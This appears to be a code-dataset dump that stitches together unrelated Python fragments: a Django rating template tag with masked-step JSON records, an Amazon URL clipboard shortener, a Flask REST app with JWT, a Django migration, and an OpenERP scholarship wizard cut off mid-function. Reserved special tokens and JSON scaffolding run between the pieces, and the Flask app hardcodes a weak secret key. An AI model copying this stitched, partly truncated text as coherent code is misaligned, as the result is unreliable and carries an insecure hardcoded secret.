def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError(
'Ожидался экземпляр django.models.Model, а получили %s.' %
type(obj))
can_vote = True
if 'user' in context and getattr(obj, 'permissions', None
) and isinstance(obj.permissions, Permissions) and hasattr(obj.
permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {'content_type': str(obj._meta), 'obj_pk': obj.pk,
'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)
}
register = template.Library()
register.tag(RatingBlock)
<|reserved_special_token_1|>
#coding=utf-8
from django import template
from classytags.helpers import InclusionTag
from classytags.core import Tag, Options
from classytags.arguments import Argument
from ratings.models import RatedItem
from blogs.permissions import Permissions
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(
Argument('obj', required=True),
)
def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError("Ожидался экземпляр django.models.Model, а получили %s." % type(obj))
can_vote = True
if 'user' in context and\
getattr(obj, 'permissions', None) and\
isinstance(obj.permissions, Permissions) and\
hasattr(obj.permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {
'content_type': str(obj._meta),
'obj_pk': obj.pk,
'can_vote': can_vote,
'score': RatedItem.objects.score_for_obj(obj),
}
register = template.Library()
register.tag(RatingBlock)
|
flexible
|
{
"blob_id": "1a05817c4c16f2d9234e504b0c98f9c9ae2dc3f7",
"index": 1525,
"step-1": "<mask token>\n\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n options = Options(Argument('obj', required=True))\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\n 'Ожидался экземпляр django.models.Model, а получили %s.' %\n type(obj))\n can_vote = True\n if 'user' in context and getattr(obj, 'permissions', None\n ) and isinstance(obj.permissions, Permissions) and hasattr(obj.\n permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n return {'content_type': str(obj._meta), 'obj_pk': obj.pk,\n 'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)\n }\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n options = Options(Argument('obj', required=True))\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\n 'Ожидался экземпляр django.models.Model, а получили %s.' %\n type(obj))\n can_vote = True\n if 'user' in context and getattr(obj, 'permissions', None\n ) and isinstance(obj.permissions, Permissions) and hasattr(obj.\n permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n return {'content_type': str(obj._meta), 'obj_pk': obj.pk,\n 'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)\n }\n\n\n<mask token>\nregister.tag(RatingBlock)\n",
"step-3": "<mask token>\n\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n options = Options(Argument('obj', required=True))\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\n 'Ожидался экземпляр django.models.Model, а получили %s.' %\n type(obj))\n can_vote = True\n if 'user' in context and getattr(obj, 'permissions', None\n ) and isinstance(obj.permissions, Permissions) and hasattr(obj.\n permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n return {'content_type': str(obj._meta), 'obj_pk': obj.pk,\n 'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)\n }\n\n\nregister = template.Library()\nregister.tag(RatingBlock)\n",
"step-4": "from django import template\nfrom classytags.helpers import InclusionTag\nfrom classytags.core import Tag, Options\nfrom classytags.arguments import Argument\nfrom ratings.models import RatedItem\nfrom blogs.permissions import Permissions\n\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n options = Options(Argument('obj', required=True))\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\n 'Ожидался экземпляр django.models.Model, а получили %s.' %\n type(obj))\n can_vote = True\n if 'user' in context and getattr(obj, 'permissions', None\n ) and isinstance(obj.permissions, Permissions) and hasattr(obj.\n permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n return {'content_type': str(obj._meta), 'obj_pk': obj.pk,\n 'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)\n }\n\n\nregister = template.Library()\nregister.tag(RatingBlock)\n",
"step-5": "#coding=utf-8\nfrom django import template\n\nfrom classytags.helpers import InclusionTag\nfrom classytags.core import Tag, Options\nfrom classytags.arguments import Argument\n\nfrom ratings.models import RatedItem\nfrom blogs.permissions import Permissions\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n\n options = Options(\n Argument('obj', required=True),\n )\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\"Ожидался экземпляр django.models.Model, а получили %s.\" % type(obj))\n can_vote = True\n if 'user' in context and\\\n getattr(obj, 'permissions', None) and\\\n isinstance(obj.permissions, Permissions) and\\\n hasattr(obj.permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n\n\n return {\n 'content_type': str(obj._meta),\n 'obj_pk': obj.pk,\n 'can_vote': can_vote,\n 'score': RatedItem.objects.score_for_obj(obj),\n }\n\n\nregister = template.Library()\nregister.tag(RatingBlock)",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def urlShortner():
if clip.paste():
text = clip.paste()
o = urlparse(text)
if not (o.scheme == 'http' or o.scheme == 'https'):
print('This is not url.')
return 1
newUrl = 'https://www.amazon.co.jp'
urlLen = len(text)
matchObj = re.search('https://www.amazon.co.jp', text)
matchObjDp = re.search('/dp/', text)
matchObjRef = re.search('/ref', text)
""""
if matchObjRef:
print (matchObjDp.start()) # マッチした文字列の開始位置: 3
print(type(matchObj.start()))
print(type(matchObj.end()))
"""
if matchObjDp and matchObjRef:
i: int = matchObjDp.start()
while i < matchObjRef.start():
newUrl = newUrl + text[i]
i = i + 1
shortUrl = newUrl.replace('www', '')
print('shortUrl:' + shortUrl)
clip.copy(shortUrl)
else:
print(
'This url is not an introduction page of books on the amazon website.'
)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def urlShortner():
if clip.paste():
text = clip.paste()
o = urlparse(text)
if not (o.scheme == 'http' or o.scheme == 'https'):
print('This is not url.')
return 1
newUrl = 'https://www.amazon.co.jp'
urlLen = len(text)
matchObj = re.search('https://www.amazon.co.jp', text)
matchObjDp = re.search('/dp/', text)
matchObjRef = re.search('/ref', text)
""""
if matchObjRef:
print (matchObjDp.start()) # マッチした文字列の開始位置: 3
print(type(matchObj.start()))
print(type(matchObj.end()))
"""
if matchObjDp and matchObjRef:
i: int = matchObjDp.start()
while i < matchObjRef.start():
newUrl = newUrl + text[i]
i = i + 1
shortUrl = newUrl.replace('www', '')
print('shortUrl:' + shortUrl)
clip.copy(shortUrl)
else:
print(
'This url is not an introduction page of books on the amazon website.'
)
urlShortner()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import re
import pyperclip as clip
from urllib.parse import urlparse
def urlShortner():
if clip.paste():
text = clip.paste()
o = urlparse(text)
if not (o.scheme == 'http' or o.scheme == 'https'):
print('This is not url.')
return 1
newUrl = 'https://www.amazon.co.jp'
urlLen = len(text)
matchObj = re.search('https://www.amazon.co.jp', text)
matchObjDp = re.search('/dp/', text)
matchObjRef = re.search('/ref', text)
""""
if matchObjRef:
print (matchObjDp.start()) # マッチした文字列の開始位置: 3
print(type(matchObj.start()))
print(type(matchObj.end()))
"""
if matchObjDp and matchObjRef:
i: int = matchObjDp.start()
while i < matchObjRef.start():
newUrl = newUrl + text[i]
i = i + 1
shortUrl = newUrl.replace('www', '')
print('shortUrl:' + shortUrl)
clip.copy(shortUrl)
else:
print(
'This url is not an introduction page of books on the amazon website.'
)
urlShortner()
<|reserved_special_token_1|>
"""
クリップボードのamazonのURLから不要な部分を削除する
"""
# -*- coding: utf-8 -*-
import re
import pyperclip as clip
from urllib.parse import urlparse
#print(clip.paste())
def urlShortner():
# text = "https://www.amazon.co.jp/Jupyter-Cookbook-Dan-Toomey/dp/1788839447/ref=sr_1_5?s=books&ie=UTF8&qid=1535164277&sr=1-5&keywords=Jupyter"
if clip.paste():
text = clip.paste()
o = urlparse(text)
# print(o.scheme)
if not (o.scheme == 'http' or o.scheme == 'https') :
print("This is not url.")
return 1
newUrl = "https://www.amazon.co.jp"
urlLen = len(text)
#print(urlLen)
matchObj = re.search(r'https://www.amazon.co.jp', text)
matchObjDp = re.search(r'/dp/', text)
matchObjRef = re.search(r'/ref', text)
""""
if matchObjRef:
print (matchObjDp.start()) # マッチした文字列の開始位置: 3
print(type(matchObj.start()))
print(type(matchObj.end()))
"""
if matchObjDp and matchObjRef:
i:int = matchObjDp.start()
#print("2ndStart:" + str(i) )
while i < matchObjRef.start():
newUrl = newUrl + text[i]
i= i+1
shortUrl = newUrl.replace("www","")
print ("shortUrl:" + shortUrl)
clip.copy(shortUrl)
else:
print ("This url is not an introduction page of books on the amazon website.")
urlShortner()
|
flexible
|
{
"blob_id": "c3c82b9ba198b7818cc8e63710140bbb6e28a9ea",
"index": 6628,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef urlShortner():\n if clip.paste():\n text = clip.paste()\n o = urlparse(text)\n if not (o.scheme == 'http' or o.scheme == 'https'):\n print('This is not url.')\n return 1\n newUrl = 'https://www.amazon.co.jp'\n urlLen = len(text)\n matchObj = re.search('https://www.amazon.co.jp', text)\n matchObjDp = re.search('/dp/', text)\n matchObjRef = re.search('/ref', text)\n \"\"\"\"\n if matchObjRef:\n print (matchObjDp.start()) # マッチした文字列の開始位置: 3\n\n print(type(matchObj.start()))\n print(type(matchObj.end()))\n\n \"\"\"\n if matchObjDp and matchObjRef:\n i: int = matchObjDp.start()\n while i < matchObjRef.start():\n newUrl = newUrl + text[i]\n i = i + 1\n shortUrl = newUrl.replace('www', '')\n print('shortUrl:' + shortUrl)\n clip.copy(shortUrl)\n else:\n print(\n 'This url is not an introduction page of books on the amazon website.'\n )\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef urlShortner():\n if clip.paste():\n text = clip.paste()\n o = urlparse(text)\n if not (o.scheme == 'http' or o.scheme == 'https'):\n print('This is not url.')\n return 1\n newUrl = 'https://www.amazon.co.jp'\n urlLen = len(text)\n matchObj = re.search('https://www.amazon.co.jp', text)\n matchObjDp = re.search('/dp/', text)\n matchObjRef = re.search('/ref', text)\n \"\"\"\"\n if matchObjRef:\n print (matchObjDp.start()) # マッチした文字列の開始位置: 3\n\n print(type(matchObj.start()))\n print(type(matchObj.end()))\n\n \"\"\"\n if matchObjDp and matchObjRef:\n i: int = matchObjDp.start()\n while i < matchObjRef.start():\n newUrl = newUrl + text[i]\n i = i + 1\n shortUrl = newUrl.replace('www', '')\n print('shortUrl:' + shortUrl)\n clip.copy(shortUrl)\n else:\n print(\n 'This url is not an introduction page of books on the amazon website.'\n )\n\n\nurlShortner()\n",
"step-4": "<mask token>\nimport re\nimport pyperclip as clip\nfrom urllib.parse import urlparse\n\n\ndef urlShortner():\n if clip.paste():\n text = clip.paste()\n o = urlparse(text)\n if not (o.scheme == 'http' or o.scheme == 'https'):\n print('This is not url.')\n return 1\n newUrl = 'https://www.amazon.co.jp'\n urlLen = len(text)\n matchObj = re.search('https://www.amazon.co.jp', text)\n matchObjDp = re.search('/dp/', text)\n matchObjRef = re.search('/ref', text)\n \"\"\"\"\n if matchObjRef:\n print (matchObjDp.start()) # マッチした文字列の開始位置: 3\n\n print(type(matchObj.start()))\n print(type(matchObj.end()))\n\n \"\"\"\n if matchObjDp and matchObjRef:\n i: int = matchObjDp.start()\n while i < matchObjRef.start():\n newUrl = newUrl + text[i]\n i = i + 1\n shortUrl = newUrl.replace('www', '')\n print('shortUrl:' + shortUrl)\n clip.copy(shortUrl)\n else:\n print(\n 'This url is not an introduction page of books on the amazon website.'\n )\n\n\nurlShortner()\n",
"step-5": "\n\"\"\"\nクリップボードのamazonのURLから不要な部分を削除する\n\"\"\"\n# -*- coding: utf-8 -*-\n\nimport re\nimport pyperclip as clip\nfrom urllib.parse import urlparse\n\n#print(clip.paste())\n\ndef urlShortner():\n# text = \"https://www.amazon.co.jp/Jupyter-Cookbook-Dan-Toomey/dp/1788839447/ref=sr_1_5?s=books&ie=UTF8&qid=1535164277&sr=1-5&keywords=Jupyter\"\n\n if clip.paste():\n text = clip.paste()\n o = urlparse(text)\n# print(o.scheme)\n\n if not (o.scheme == 'http' or o.scheme == 'https') :\n print(\"This is not url.\")\n return 1\n\n newUrl = \"https://www.amazon.co.jp\"\n\n urlLen = len(text)\n #print(urlLen)\n\n matchObj = re.search(r'https://www.amazon.co.jp', text)\n matchObjDp = re.search(r'/dp/', text)\n matchObjRef = re.search(r'/ref', text)\n\n \"\"\"\"\n if matchObjRef:\n print (matchObjDp.start()) # マッチした文字列の開始位置: 3\n\n print(type(matchObj.start()))\n print(type(matchObj.end()))\n\n \"\"\"\n\n if matchObjDp and matchObjRef:\n i:int = matchObjDp.start()\n #print(\"2ndStart:\" + str(i) )\n while i < matchObjRef.start():\n newUrl = newUrl + text[i]\n i= i+1\n\n shortUrl = newUrl.replace(\"www\",\"\")\n\n print (\"shortUrl:\" + shortUrl)\n\n clip.copy(shortUrl)\n\n else:\n print (\"This url is not an introduction page of books on the amazon website.\")\n\n\nurlShortner()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
api.add_resource(StoreList, '/stores')
api.add_resource(Store, '/store/<string:name>')
api.add_resource(ItemList, '/items')
api.add_resource(Item, '/item/<string:name>')
api.add_resource(UserRegister, '/register')
if __name__ == '__main__':
from db import db
db.init_app(app)
app.run(port=5000, debug=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',
'sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'naveen'
api = Api(app)
jwt = JWT(app, authenticate, identity)
api.add_resource(StoreList, '/stores')
api.add_resource(Store, '/store/<string:name>')
api.add_resource(ItemList, '/items')
api.add_resource(Item, '/item/<string:name>')
api.add_resource(UserRegister, '/register')
if __name__ == '__main__':
from db import db
db.init_app(app)
app.run(port=5000, debug=True)
<|reserved_special_token_1|>
import os
from flask import Flask, request
from flask_restful import Resource, Api, reqparse
from flask_jwt import JWT, jwt_required
from resources.Users import UserRegister
from security import authenticate, identity
from resources.items import Item, ItemList
from resources.stores import Store, StoreList
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',
'sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'naveen'
api = Api(app)
jwt = JWT(app, authenticate, identity)
api.add_resource(StoreList, '/stores')
api.add_resource(Store, '/store/<string:name>')
api.add_resource(ItemList, '/items')
api.add_resource(Item, '/item/<string:name>')
api.add_resource(UserRegister, '/register')
if __name__ == '__main__':
from db import db
db.init_app(app)
app.run(port=5000, debug=True)
<|reserved_special_token_1|>
import os
from flask import Flask,request
from flask_restful import Resource,Api,reqparse
from flask_jwt import JWT,jwt_required
from resources.Users import UserRegister
from security import authenticate,identity
from resources.items import Item, ItemList
from resources.stores import Store, StoreList
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL','sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'naveen'
api = Api(app)
jwt = JWT(app,authenticate,identity)
api.add_resource(StoreList,"/stores")
api.add_resource(Store,"/store/<string:name>")
api.add_resource(ItemList,"/items")
api.add_resource(Item,"/item/<string:name>")
api.add_resource(UserRegister,"/register")
if __name__ =="__main__":
from db import db
db.init_app(app)
app.run(port=5000,debug=True)
|
flexible
|
{
"blob_id": "bf8f7b51b685f0e9131cb4d8a0bfc16ee5ad1263",
"index": 3281,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napi.add_resource(StoreList, '/stores')\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(port=5000, debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',\n 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'naveen'\napi = Api(app)\njwt = JWT(app, authenticate, identity)\napi.add_resource(StoreList, '/stores')\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(port=5000, debug=True)\n",
"step-4": "import os\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_jwt import JWT, jwt_required\nfrom resources.Users import UserRegister\nfrom security import authenticate, identity\nfrom resources.items import Item, ItemList\nfrom resources.stores import Store, StoreList\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',\n 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'naveen'\napi = Api(app)\njwt = JWT(app, authenticate, identity)\napi.add_resource(StoreList, '/stores')\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(port=5000, debug=True)\n",
"step-5": "import os\nfrom flask import Flask,request\nfrom flask_restful import Resource,Api,reqparse\nfrom flask_jwt import JWT,jwt_required\nfrom resources.Users import UserRegister\nfrom security import authenticate,identity\nfrom resources.items import Item, ItemList\nfrom resources.stores import Store, StoreList\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL','sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'naveen'\napi = Api(app)\n\n\n\njwt = JWT(app,authenticate,identity)\n\n\n\napi.add_resource(StoreList,\"/stores\")\napi.add_resource(Store,\"/store/<string:name>\")\napi.add_resource(ItemList,\"/items\")\napi.add_resource(Item,\"/item/<string:name>\")\napi.add_resource(UserRegister,\"/register\")\n\nif __name__ ==\"__main__\":\n from db import db\n db.init_app(app)\n app.run(port=5000,debug=True) ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='Kategori', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('nama_kategori', models.CharField(
max_length=30)), ('deskripsi', models.CharField(max_length=100))]),
migrations.CreateModel(name='Stone', fields=[('id', models.
AutoField(auto_created=True, primary_key=True, serialize=False,
verbose_name='ID')), ('kode', models.CharField(max_length=30)), (
'deskripsi', models.CharField(max_length=200)), ('cover_stone',
models.ImageField(upload_to='\\images')), ('kategori', models.
ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=
'stones.Kategori'))])]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='Kategori', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('nama_kategori', models.CharField(
max_length=30)), ('deskripsi', models.CharField(max_length=100))]),
migrations.CreateModel(name='Stone', fields=[('id', models.
AutoField(auto_created=True, primary_key=True, serialize=False,
verbose_name='ID')), ('kode', models.CharField(max_length=30)), (
'deskripsi', models.CharField(max_length=200)), ('cover_stone',
models.ImageField(upload_to='\\images')), ('kategori', models.
ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=
'stones.Kategori'))])]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-08-03 02:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Kategori',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nama_kategori', models.CharField(max_length=30)),
('deskripsi', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Stone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('kode', models.CharField(max_length=30)),
('deskripsi', models.CharField(max_length=200)),
('cover_stone', models.ImageField(upload_to='\\images')),
('kategori', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stones.Kategori')),
],
),
]
|
flexible
|
{
"blob_id": "cdd929ee041c485d2a6c1149ea1b1ced92d7b7ab",
"index": 5972,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Kategori', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('nama_kategori', models.CharField(\n max_length=30)), ('deskripsi', models.CharField(max_length=100))]),\n migrations.CreateModel(name='Stone', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('kode', models.CharField(max_length=30)), (\n 'deskripsi', models.CharField(max_length=200)), ('cover_stone',\n models.ImageField(upload_to='\\\\images')), ('kategori', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'stones.Kategori'))])]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Kategori', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('nama_kategori', models.CharField(\n max_length=30)), ('deskripsi', models.CharField(max_length=100))]),\n migrations.CreateModel(name='Stone', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('kode', models.CharField(max_length=30)), (\n 'deskripsi', models.CharField(max_length=200)), ('cover_stone',\n models.ImageField(upload_to='\\\\images')), ('kategori', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'stones.Kategori'))])]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.2 on 2016-08-03 02:31\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Kategori',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nama_kategori', models.CharField(max_length=30)),\n ('deskripsi', models.CharField(max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Stone',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('kode', models.CharField(max_length=30)),\n ('deskripsi', models.CharField(max_length=200)),\n ('cover_stone', models.ImageField(upload_to='\\\\images')),\n ('kategori', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stones.Kategori')),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# coding: utf-8
from openerp import SUPERUSER_ID
from openerp.osv import osv, fields
from openerp.addons.ud.ud import _TIPOS_BOLSA
TIPOS_BOLSA = dict(_TIPOS_BOLSA)
def get_banco(cls, cr, browse_record, usuario_id, context=None):
dados_bancarios_model = cls.pool.get("ud.dados.bancarios")
args = [("banco_id", "=", browse_record.banco_id.id)]
if browse_record.agencia_v:
args.append(("agencia", "=", browse_record.agencia))
if browse_record.dv_agencia_v:
args.append(("dv_agencia", "=", browse_record.dv_agencia))
if browse_record.conta_v:
args.append(("conta", "=", browse_record.conta))
if browse_record.dv_conta_v:
args.append(("dv_conta", "=", browse_record.dv_conta))
if browse_record.operacao_v:
args.append(("operacao", "=", browse_record.operacao))
dados_bancarios = dados_bancarios_model.search(cr, SUPERUSER_ID, args, context=context)
if dados_bancarios:
dados_bancarios = dados_bancarios_model.browse(cr, SUPERUSER_ID, dados_bancarios[0])
if not dados_bancarios.ud_conta_id:
return dados_bancarios.id
elif dados_bancarios.ud_conta_id.id == usuario_id:
return dados_bancarios.id
raise osv.except_osv(u"Dados Bancários duplicados", u"Outra pessoa já possui esses dados bancários!")
dados = {"banco_id": browse_record.banco_id.id, "agencia": browse_record.agencia, "dv_agencia": browse_record.dv_agencia,
"conta": browse_record.conta, "dv_conta": browse_record.dv_conta, "operacao": browse_record.operacao,
"ud_conta_id": usuario_id}
return dados_bancarios_model.create(cr, SUPERUSER_ID, dados, context=context)
class AdicionarBolsaWizard(osv.TransientModel):
_name = "ud.monitoria.bolsa.adicionar.wizard"
_description = u"Inclusão de bolsa de monitoria para discente (UD)"
_STATES = [
("n_bolsista", u"Não Bolsista"),
("reserva", u"Cadastro de Reserva"),
]
def _bolsas(self, cr, uid, ids, campos, args, context=None):
oferta_model = self.pool.get("ud.monitoria.oferta.disciplina")
res = {}
for add in self.browse(cr, uid, ids, context):
res[add.id] = add.disciplina_id.bolsas
return res
_columns = {
"semestre_id": fields.many2one("ud.monitoria.registro", u"Semestre", required=True, readonly=True),
"curso_id": fields.many2one("ud.curso", u"Curso", required=True, domain="[('is_active', '=', True)]"),
"disciplina_id": fields.many2one("ud.monitoria.disciplina", u"Disciplinas", required=True,
domain="[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id), "
"('is_active', '=', True)]"),
"bolsas": fields.function(_bolsas, type="integer", string=u"Bolsas disponíveis",
help=u"Número de bolsas disponíveis para a disciplina"),
"valor_bolsa": fields.float(u"Bolsa (R$)"),
"tutor": fields.boolean(u"Tutor?"),
"status": fields.selection(_STATES, u"Status", required=True),
"doc_discente_id": fields.many2one("ud.monitoria.documentos.discente", u"Discente", required=True,
domain="[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), "
"('is_active', '=', True), ('state', '=', status)]"),
# DADOS BANCÁRIOS
"dados_bancarios_id": fields.many2one("ud.dados.bancarios", u"Dados Bancários", domain=[('id', '=', False)]),
"banco_id": fields.many2one("ud.banco", u"Banco", ondelete="restrict"),
"agencia": fields.char(u"Agência", size=4, help=u"Número da Agência"),
"dv_agencia": fields.char(u"DV Agência", size=2, help=u"Dígito verificador da Agência"),
"conta": fields.char(u"Conta", size=10, help=u"Número da Conta"),
"dv_conta": fields.char(u"DV Conta", size=1, help=u"Dígito verificador da Conta"),
"operacao": fields.char(u"Operação", size=3, help=u"Tipo de conta"),
"agencia_v": fields.related("banco_id", "agencia", type="boolean", invisible=True, readonly=True),
"dv_agencia_v": fields.related("banco_id", "dv_agencia", type="boolean", invisible=True, readonly=True),
"conta_v": fields.related("banco_id", "conta", type="boolean", invisible=True, readonly=True),
"dv_conta_v": fields.related("banco_id", "dv_conta", type="boolean", invisible=True, readonly=True),
"operacao_v": fields.related("banco_id", "operacao", type="boolean", invisible=True, readonly=True),
}
def default_get(self, cr, uid, fields_list, context=None):
res = super(AdicionarBolsaWizard, self).default_get(cr, uid, fields_list, context)
res["status"] = "n_bolsista"
res["valor_bolsa"] = 400.
context = context or {}
if context.get("active_id", False):
if context.get("active_model", False) == "ud.monitoria.registro":
res["semestre_id"] = context.get("active_id")
elif context.get("active_model", False) == "ud.monitoria.documentos.discente":
doc = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, context.get("active_id"), context)
if doc.state == "bolsista":
raise osv.except_osv(u"Discente bolsista", u"O discente já é bolsista")
elif not doc.is_active:
raise osv.except_osv(u"Documento do discente inativo", u"Não é possível alterar o status de discentes inativos")
res["semestre_id"] = doc.disciplina_id.semestre_id.id
res["curso_id"] = doc.disciplina_id.curso_id.id
res["disciplina_id"] = doc.disciplina_id.id
res["tutor"] = doc.tutor
res["status"] = doc.state
res["doc_discente_id"] = doc.id
return res
def onchange_curso(self, cr, uid, ids, semestre_id, curso_id, disciplina_id, context=None):
if not (semestre_id and curso_id):
return {"value": {"disciplina_id": False}}
reg = self.pool.get("ud.monitoria.registro").read(cr, uid, semestre_id, ["processos_seletivos_ids"], context=context, load="_classic_write")
args = [("curso_id", "=", curso_id), ("processo_seletivo_id", "=", reg["processos_seletivos_ids"]), ("is_active", "=", True)]
disc = self.pool.get("ud.monitoria.disciplina").search(cr, uid, args, context=context)
res = {"domain": {"disciplina_id": [("id", "in", disc)]}}
if not disc:
